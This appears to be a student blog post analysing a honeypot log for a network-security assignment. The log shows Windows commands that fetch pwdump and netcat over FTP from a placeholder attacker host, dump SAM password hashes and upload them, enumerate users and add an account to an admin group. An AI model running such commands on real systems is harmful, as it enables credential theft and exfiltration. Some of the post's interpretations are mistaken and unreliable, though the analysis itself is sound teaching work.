网络安全大作业1--蜜罐攻击记录

问某dalao同学要来的大作业1,这里记录研究过程:

网络安全大作业1–蜜罐记录

本实验中所用的操作系统:Windows 7旗舰版 SP1。来自200.1.x.y(假设的IP)的攻击者成功攻陷了一台部署有蜜罐系统的主机222.200.p.q(假设的IP),蜜罐主机记录了入侵过程,入侵数据经提取并经简化处理后的脚本代码如下所示。其中,www.unknown.net是假设的域名。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
echo werd >> c:\fun
echo user johna2k > ftpcom
echo hacker 2000 >> ftpcom
echo get samdump.dll >> ftpcom
echo get pwdump.exe >> ftpcom
echo get nc.exe>>ftpcom
echo quit>>ftpcom
ftp –s:ftpcom -nwww.unknown.net
pwdump.exe>>new.pass
echo userjohna2k > ftpcom2
echo hacker2000>>ftpcom2
put new.pass>>ftpcom2
echo quit>>ftpcom2
ftp -s:ftpcom2 –n www.unknown.net
ftp 200.1.x.y
echo open 200.1.x.y > ftpcom
echo johna2k > ftpcom
echo hacker2000 >> ftpcom
echo get samdump.dll >> ftpcom
echo get pwdump.exe >> ftpcom
echo get nc.exe >> ftpcom
echo quit >> ftpcom
open 200.1.x.y
echo johna2k >> sasfile
echo haxedj00 >> sasfile
echo get pwdump.exe >> sasfile
echo get samdump.dll >> sasfile
echo get nc.exe >> sasfile
echo quit >> sasfile
ftp –s:sasfile
open 200.1.x.y
echo johna2k >> sasfile
echo haxedj00 >> sasfile
echo get pwdump.exe >> sasfile
echo get samdump.dll >> sasfile
echo get nc.exe >> sasfile
echo quit >> sasfile
C:\Program Files\Common Files\system\msad c\pwdump.exe >> yay.txt
C:\Program Files\Common Files\system\msad c\pwdump.exe >> c:\yay.txt
pwdump.exe >> c:\yay.txt
net session >> yay2.txt
net session >> c:\yay2.txt
net users >> heh.txt
net users >> c:\heh.txt
net localgroup Domain Admin IWAM_KENNY /ADD
mkdir–/s
mkdir
mkdir –s/
mkdir /s –
type c:\winnt\repair\sa._ >> c:\har.txt
del c:\inetpub\wwwroot\har.txt
del c:\inetpub\wwwroot\har.txt
type c:\winnt\repair\sa._ >> c:\har.txt
del c:\inetpub\wwwroot\har.txt
del c:\inetpub\wwwroot\har.txt

代码略长,我们一点点分析 :

1
2
3
echo werd >> c:\fun
echo user johna2k > ftpcom
echo hacker 2000 >> ftpcom

应该是记录了攻击者的名字以及攻击的端口,从变量名字上看,是一个ftp的网站?

1
2
3
4
5
6
echo get samdump.dll >> ftpcom
echo get pwdump.exe >> ftpcom
echo get nc.exe>>ftpcom
echo quit>>ftpcom
ftp –s:ftpcom -nwww.unknown.net
pwdump.exe>>new.pass

这一段比较有趣,samdump.dll是啥呢,随便上网一看,找到了一些相关的信息:

%Temp%\data\pwdump2\samdump.dll
%Temp%\data\pwdump2-orig\samdump.dll
%Temp%\ixp000.tmp\pwdump2\samdump.dll
%Temp%\ixp001.tmp\pwdump2\samdump.dll
%Temp%\pwdump2\samdump.dll
%Temp%\rarsfx0\pwdump2\samdump.dll
%Temp%\rarsfx3\pwdump2\samdump.dll
6了,这个pwdump怎么听也不像一个好东西吧?随便上网查一下就会发现,这个东西会是一个系统授权信息导出工具。其甚至可以导出用户的LM hash处理过的密码!这里解释一下LM是啥,LM就是微软提供的一种加密方式,类似与hash,其中有DES加密的参与的一种算法。
加上ftp -s,大致就能明白:

然后利用下载的pwdump.exe,找到windows的sam密码。

1
2
3
4
5
echo userjohna2k > ftpcom2
echo hacker2000>>ftpcom2
put new.pass>>ftpcom2
echo quit>>ftpcom2
ftp -s:ftpcom2 –n www.unknown.net

这一段很显然,就是将这个new.pass上传到了指定的网站上。但是!仔细看的话会发现这个hacker似乎忘记打echo了。。。估计是上传失败了

1
2
3
4
5
6
7
8
9
ftp 200.1.x.y
echo open 200.1.x.y > ftpcom
echo johna2k > ftpcom
echo hacker2000 >> ftpcom
echo get samdump.dll >> ftpcom
echo get pwdump.exe >> ftpcom
echo get nc.exe >> ftpcom
echo quit >> ftpcom
open 200.1.x.y

第一句话存疑,可能是攻击者自己登陆了ftp,然后下载?联系最后一句莫名冒出来的open,加上之前的操作。这个人很可能操作错误了,而且从后面的内容看,这一段依然是错误的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
echo johna2k >> sasfile
echo haxedj00 >> sasfile
echo get pwdump.exe >> sasfile
echo get samdump.dll >> sasfile
echo get nc.exe >> sasfile
echo quit >> sasfile
ftp –s:sasfile
open 200.1.x.y
echo johna2k >> sasfile
echo haxedj00 >> sasfile
echo get pwdump.exe >> sasfile
echo get samdump.dll >> sasfile
echo get nc.exe >> sasfile
echo quit >> sasfile

这里又是重新的将之前的攻击文件下载了下来。估计是之前登陆的密码都是错的,这里

1
2
3
C:\Program Files\Common Files\system\msad c\pwdump.exe >> yay.txt
C:\Program Files\Common Files\system\msad c\pwdump.exe >> c:\yay.txt
pwdump.exe >> c:\yay.txt

从这次来看,估计是前几次攻击存放的hash值存在差异导致,最后多次将数据存入yay.txt以确保受到数据。

1
2
3
4
5
6
7
net session >> yay2.txt
net session >> c:\yay2.txt
net users >> heh.txt
net users >> c:\heh.txt
net localgroup Domain Admin IWAM_KENNY /ADD

这段比较有意思,键入不带参数的 net session 可以显示所有与本地计算机的会话的信息。而net users则是显示出当前的所有用户。最后一句话正好符合:
net localgroup groupname name […] {/ADD | /DELETE} [/DOMAIN]
虽然不知道IWAM_KENNY是啥,但是大概的意思就是将Admin加入Domain用户组。

1
2
3
4
5
6
7
8
9
10
mkdir–/s
mkdir
mkdir –s/
mkdir /s –
type c:\winnt\repair\sa._ >> c:\har.txt
del c:\inetpub\wwwroot\har.txt
del c:\inetpub\wwwroot\har.txt
type c:\winnt\repair\sa._ >> c:\har.txt
del c:\inetpub\wwwroot\har.txt
del c:\inetpub\wwwroot\har.txt

最后这个家伙企图新建文件夹(这四条都打错了。。),而c:\winnt\repair\sam._ sa这句话是读取本地的sam数据库(就是存放admin hash的位置)。最后在完成了偷窥后(不知道成功了吗,好像打错了),就将数据删除了。

相关作业题目

(1) 攻击序列中生成几个批处理文件?
ftpcom, ftpcom2, fun(?), sasfile, yay.txt, yay2.txt, har.txt

(2)攻击者使用了什么黑客工具进行攻击?
pwdump,可以将当前的系统授权信息导出的工具。可能会泄露管理员密码。

(3)攻击者如何使用黑客工具进入并控制系统?关键技术是什么?
这个代码中并没有提到。给出代码段中也只有一些失败的操作。但是似乎有一次成功下载了nc.exe和pwdump.exe,不知道有没有后续操作。

(4)当攻击者获得系统的访问权后做了什么?(需具体描述)
多次企图登陆ftp下载pwdump.exe和nc.exe,对会话和用户进行了查看(嗅探?),企图创建文件加,最后似乎找到了文件并且查看(估计也没看到)

(5)如何防止这样的攻击?
打补丁呀当然是。

(6)攻击者是否警觉其攻击的目标是一台蜜罐主机?如果是,为什么?
我感觉没有。。。就mkdir都能打错的话估计也没想到蜜罐。

(7)攻击者在最后多次使用mkdir命令,这是Windows的合法命令吗?其企图是什么?为什么会连用多个同命令?
没啥企图吧。。。他打错了呀。可能是打算创建文件然后失败了。